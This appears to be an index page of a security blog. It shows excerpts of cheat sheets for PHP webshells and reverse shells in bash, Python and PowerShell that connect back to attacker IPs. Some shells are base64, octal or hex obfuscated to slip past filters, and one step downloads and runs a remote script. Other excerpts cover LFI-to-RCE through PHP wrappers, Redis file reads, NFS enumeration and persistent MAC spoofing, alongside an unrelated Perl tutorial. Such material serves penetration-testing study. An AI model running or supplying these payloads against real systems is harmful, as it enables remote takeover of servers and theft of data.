Gajendra Mahato

PHP Reverse Shell & Webshell Cheat Sheet

This cheat sheet contains common PHP reverse shells and webshell snippets that work in different scenarios.

1. Basic Webshell Using system()

    <?php system($_GET['cmd']); ?>

Usage: Execute commands by passing the cmd parameter in the URL. Example: http://target.com/webshell.php?cmd=ls

2. PHP Reverse Shell Using One-liner with fsockopen()

    php -r '$sock=fsockopen("10.9.50.114",3232);exec("/bin/sh -i <&3 >&3 2>&3");'

Run this on the target if you can execute PHP code directly. Connects back to your listener on port 3232.

3. PHP Reverse Shell Using Named Pipe & Netcat

    <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.50.114 4242 >/tmp/f")?>

Uses a named pipe (/tmp/f) for a stable reverse shell. Requires nc (Netcat) on the target machine.

4. PHP One-liner Bash Reverse Shell (Backgrounded)

    <?PHP exec("nohup /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/9001 0>&1' > /dev/null 2>&1 &"); ?>

Runs the bash reverse shell in the background. Useful to keep the shell alive after the HTTP request ends.

🔥 Tips & Notes

Replace IP and ports with your attacker machine’s IP and desired port.
Use nc -lvnp <port> on your machine to catch the reverse shell.
Some functions like exec(), system() might be disabled — test alternatives (passthru(), shell_exec(), popen()).
If nc is not installed on the target, try pure PHP or bash based shells.
Always check if the web server user has permissions to execute commands or create named pipes.
Combine these shells with Chankro or php-reverse-shell for better evasion.

January 13, 2026 · 2 min · Gajendra Mahato

Python Reverse Shell Cheat Sheet

This cheat sheet shows useful Python reverse shell one-liners and a PowerShell reverse shell generator in Python.

1. Python3 Reverse Shell One-liner

    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.50.114",3232));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Connects back to attacker IP 10.9.50.114 on port 3232. Uses a socket and duplicates its file descriptor onto stdin/stdout/stderr. Spawns an interactive /bin/sh shell. Works on most Linux systems with Python 3 installed.

2. Python Script to Generate PowerShell Reverse Shell Command (Base64 Encoded)

    #!/usr/bin/env python3
    import sys
    import base64

    def help():
        print("USAGE: %s IP PORT" % sys.argv[0])
        print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT")
        exit()

    try:
        (ip, port) = (sys.argv[1], int(sys.argv[2]))
    except:
        help()

    payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
    payload = payload % (ip, port)
    cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
    print(cmdline)

How to use: Run this script: ...

January 13, 2026 · 2 min · Gajendra Mahato

RCE via LFI wrappers in PHP

Target File: .htaccess

Output with PHP String Filters

No Filter Applied
Output: Testing PHP Filter

Payload: php://filter/convert.base64-encode/resource=.htaccess
Output: VGVzdGluZyBQSFAgRmlsdGVy

Payload: php://filter/string.rot13/resource=.htaccess
Output: Grfgvat CUC Svygre

Payload: php://filter/string.toupper/resource=.htaccess
Output: TESTING PHP FILTER

Payload: php://filter/string.tolower/resource=.htaccess
Output: testing php filter

Payload: php://filter/string.strip_tags/resource=.htaccess
Output: Testing PHP Filter
This filter removes any HTML or PHP tags from the file contents.

PHP Payload: <?php system($_GET['cmd']); echo 'Shell done!'; ?>

Payload for LFI to RCE: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+&cmd=whoami
Output: www-data

January 13, 2026 · 1 min · Gajendra Mahato

Reading a File in Redis-CLI Interactive Shell

Redis allows the execution of Lua scripts through the EVAL command. If Redis is misconfigured or exposed to attackers, the Lua scripting engine can be used to execute arbitrary commands, including reading files on the system.

File Read via EVAL Command

You can read the contents of a file (e.g., /flag.txt) using the EVAL command in the Redis interactive shell:

    EVAL "return io.popen('cat /flag.txt'):read('*a')" 0

January 13, 2026 · 1 min · Gajendra Mahato

Reverse Shell Payloads for bash

bash -c 'bash -i >& /dev/tcp/10.10.10.14/9001 0>&1'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Reverse Shell Payload with Encoded Command

bash -c echo${IFS}YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx|base64${IFS}-d|bash

bash -c {echo,YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx}|{base64,-d}|{bash,-i}

Best way to escape bad characters (Recommended)

echo "bash -c 'exec bash -i &>/dev/tcp/10.10.14.37/9001 <&1'" > revshell.sh
curl$IFS'10.10.14.37/revshell.sh'$IFS'-o'$IFS'/tmp/revshell.sh'
bash$IFS'/tmp/revshell.sh'

Reverse Shell by using octal escape sequences

Generating RevShell (escape sequence)

echo -n "/bin/sh -c 'sh -i >& /dev/tcp/10.10.14.56/9001 0>&1'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g'

echo -n "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.56\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g'

Generating RevShell (Hex escape sequence)

echo -n "sh -c 'exec sh -i &>/dev/tcp/10.10.14.56/9001 <&1'" | xxd -p|tr -d '\n'|sed 's/../\\x&/g'

Executing RevShell (Never forget to URL-encode if you are sending it via HTTP/S)

printf '\057\142\151\156\057\163\150\040\055\143\040\047\057\142\151\156\057\163\150\040\055\151\040\076\046\040\057\144\145\166\057\164\143\160\057\061\060\056\061\060\056\061\064\056\065\066\057\071\060\060\061\040\060\076\046\061\047'|sh

Additional Shell Options and Tools

Don’t forget to check with other shells such as sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash. Additionally, consider using Socat for more flexibility: ...

January 13, 2026 · 1 min · Gajendra Mahato

Rules for Kali Linux facebook group

1. Stay Focused on Learning & Skill Development: This group is a knowledge hub for ethical hacking, cybersecurity, and Kali Linux.
✅ Ask questions, share knowledge, and help each other grow!
✅ All posts must be relevant to these topics.
🚫 Basic Kali errors? Ask in the Community Chat, not as a post.
💡 Tip: Search before asking! Many common issues are already discussed.
We’re here to learn, not to clutter the group with unnecessary posts. ...

January 13, 2026 · 3 min · Gajendra Mahato

Scanning `rpcbind` on the Network

To scan for rpcbind on a network and check NFS shares, use the following command:

    sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP   # Scan port 111 for rpcbind and list NFS shares

Listing Mounted Partitions on the Network

To list the exported partitions of a network system, use:

    showmount -e $IP   # List the exported directories on the NFS server

Mounting rpcbind Directories on the Local Machine

To mount a remote NFS directory on the local machine. In this example, the directory /var is mounted from the remote server with IP 10.10.122.178. ...

January 13, 2026 · 2 min · Gajendra Mahato

Spoofing MAC Address in a Persistent fashion

This method allows users to change their WiFi adapter’s MAC address persistently. It also enables users to bypass MAC address blacklisting by network owners, as it allows connection to WiFi networks with a spoofed MAC address.

Step 1: Writing a systemd Service

Create a systemd service to change your MAC address and place it in the /etc/systemd/system/ directory with the name mac-spoofer.service.

    cat /etc/systemd/system/mac-spoofer.service

    [Unit]
    Description=MAC Address Change/spoofing wlo1
    Wants=network-pre.target
    Before=network-pre.target
    BindsTo=sys-subsystem-net-devices-wlo1.device
    After=sys-subsystem-net-devices-wlo1.device

    [Service]
    Type=oneshot
    User=root
    ExecStart=/usr/bin/ifconfig wlo1 down
    ExecStart=/usr/bin/macchanger -r -b wlo1
    ExecStart=/usr/bin/ifconfig wlo1 up

    [Install]
    WantedBy=multi-user.target

Step 2: Creating a Dispatcher Script

Create a script in the /etc/NetworkManager/dispatcher.d/ directory and grant it executable permission. This directory contains scripts to handle various network-related events, which are automatically executed in response to specific events managed by NetworkManager. ...

January 13, 2026 · 2 min · Gajendra Mahato

SQL Injection Vulnerability Exploration Cheat Sheet

Identifying SQL Injection Vulnerability Parameters

Comments in SQL:
    --     MySQL Linux style
    --+    MySQL Windows style
    #      Hash (URL-encode it when sending in a request)
    --+-   SQL comment
    ;%00   Null byte
    `      Backtick

To ascertain SQL injection vulnerability in parameters, test various symbols and observe any error or unusual behavior. Common symbols include:
    id=[Nothing]
    id='
    id=''
    id="
    id=`
    id=')
    id=")
    id=`)
    id='))
    id="))
    id=`))

Examples of SQL Injection Testing

Perform SQL injection testing with different payloads. If the payload results in an error or unexpected behavior, it might indicate a vulnerability. Examples include: ...

January 13, 2026 · 2 min · Gajendra Mahato

String Manipulation in Perl with s///, y///, and s///g

Perl provides powerful operators for manipulating strings using regular expressions. Here’s a breakdown of each operator with examples:

s/// (Substitution Operator)

Syntax: s/old-pattern/new-pattern/
Purpose: Replaces occurrences of old-pattern with new-pattern in a string.
Example: s/John/Doe/ replaces the first instance of “John” with “Doe”.

Example 1: Replace “John” with “Doe”

    $text = "Hello John. John is a friend.";
    $text =~ s/John/Doe/;   # Result: "Hello Doe. John is a friend."

Example 2: Replace “white” with “black” ...

January 13, 2026 · 3 min · Gajendra Mahato